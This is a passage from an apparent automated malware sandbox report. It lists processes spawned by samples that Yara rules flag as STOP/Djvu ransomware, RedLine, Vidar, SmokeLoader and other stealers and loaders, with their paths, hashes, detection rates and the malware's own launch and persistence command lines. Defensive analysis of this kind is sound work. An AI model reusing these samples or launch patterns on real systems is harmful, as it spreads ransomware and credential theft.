                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.650483753.0000000001DE5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 38%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:12
                                                                                                  Start time:20:23:47
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.686700698.00000000038E1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  Reputation:low

                                                                                                  Target ID:13
                                                                                                  Start time:20:23:47
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:15
                                                                                                  Start time:20:23:50
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\F42F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\F42F.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:19
                                                                                                  Start time:20:23:52
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.655311852.000000000380D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:20
                                                                                                  Start time:20:23:53
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:22
                                                                                                  Start time:20:23:54
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6E6C.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6E6C.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.659735922.0000000001E75000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  Reputation:low

                                                                                                  Target ID:23
                                                                                                  Start time:20:23:55
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6E6C.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6E6C.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:24
                                                                                                  Start time:20:23:55
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.664592242.0000000001D16000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:25
                                                                                                  Start time:20:23:57
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:26
                                                                                                  Start time:20:23:57
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:27
                                                                                                  Start time:20:23:58
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.671423517.0000000003858000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:28
                                                                                                  Start time:20:24:00
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\E3B7.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\E3B7.exe
                                                                                                  Imagebase:0xe30000
                                                                                                  File size:4531200 bytes
                                                                                                  MD5 hash:4E40E00BE3370FB1F562B1E09E1275C1
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\E3B7.exe, Author: ditekSHen
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 88%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:29
                                                                                                  Start time:20:24:00
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:30
                                                                                                  Start time:20:24:02
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\4C9F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\4C9F.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:223232 bytes
                                                                                                  MD5 hash:A7CC38586C03E1CEEB39E09BC99498A3
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001E.00000002.691480155.0000000001B50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001E.00000002.692342997.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.695759811.0000000001D56000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  Reputation:low

                                                                                                  Target ID:31
                                                                                                  Start time:20:24:03
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\3971.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\3971.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.701349893.0000000001C93000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001F.00000002.703237929.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 38%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:32
                                                                                                  Start time:20:24:03
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\aafg31.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\aafg31.exe"
                                                                                                  Imagebase:0x7ff7db460000
                                                                                                  File size:427520 bytes
                                                                                                  MD5 hash:B64DE8CDC8E3266F695C59918CF0075C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.760836250.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.767905065.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.770864078.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.773272246.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.772080220.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.760942402.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.771119197.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.769586177.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Fabookie, Description: Yara detected Fabookie, Source: 00000020.00000003.761713931.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 35%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:33
                                                                                                  Start time:20:24:04
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:348672 bytes
                                                                                                  MD5 hash:B7133C4070082747C60BF6191A5F70DE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000021.00000002.700947142.0000000001E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.694598336.0000000001D31000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 58%, ReversingLabs

                                                                                                  Target ID:34
                                                                                                  Start time:20:24:06
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\3971.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\3971.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                  Target ID:35
                                                                                                  Start time:20:24:08
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.703891224.000000000393F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown

                                                                                                  Target ID:36
                                                                                                  Start time:20:24:08
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\AB42.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\AB42.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000024.00000002.694111730.000000000380C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
